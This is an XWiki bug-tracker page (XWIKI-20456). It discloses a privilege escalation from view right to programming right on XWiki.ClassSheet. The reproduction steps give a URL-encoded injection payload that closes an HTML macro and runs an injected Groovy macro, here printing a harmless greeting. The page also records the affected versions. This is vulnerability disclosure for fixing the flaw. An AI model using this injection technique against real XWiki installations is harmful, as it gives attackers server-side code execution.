Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20456

Privilege escalation (PR) from view right on XWiki.ClassSheet

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      Open <xwiki-host>/xwiki/bin/view/%22%2F%7D%7D%7B%7B%2Fhtml%7D%7D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=XWiki.ClassSheet&xpage=view, where <xwiki-host> is the URL of your XWiki installation.

      Expected result:

      An empty Live Data is displayed under "Existing pages". Buttons to create the sheet and the template are displayed below the respective headings.

      Actual result:

      The text

      The following pages have objects described by this class.
      
      The [liveData] macro is a standalone macro and it cannot be used inline. Click on this message for details.
      {{/html}} Hello from groovy!.WebHome"
      

      is displayed below "Existing pages". Below the "Class Sheets" and "Class Template" headings, errors are displayed together with the output Hello from groovy!.WebHome"/> This shows that the Groovy macro from the URL was executed three times and thus demonstrates a privilege escalation from view to programming right.

      The first occurrence has been introduced by the migration to Live Data in XWIKI-18757 and thus affects releases starting with 13.10-rc-1. The other two exist since the introduction of the sheet in XWIKI-11904 and thus since 7.0-rc-1.

      Attachments

        Issue Links

          Activity

            People

              mleduc Manuel Leduc
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: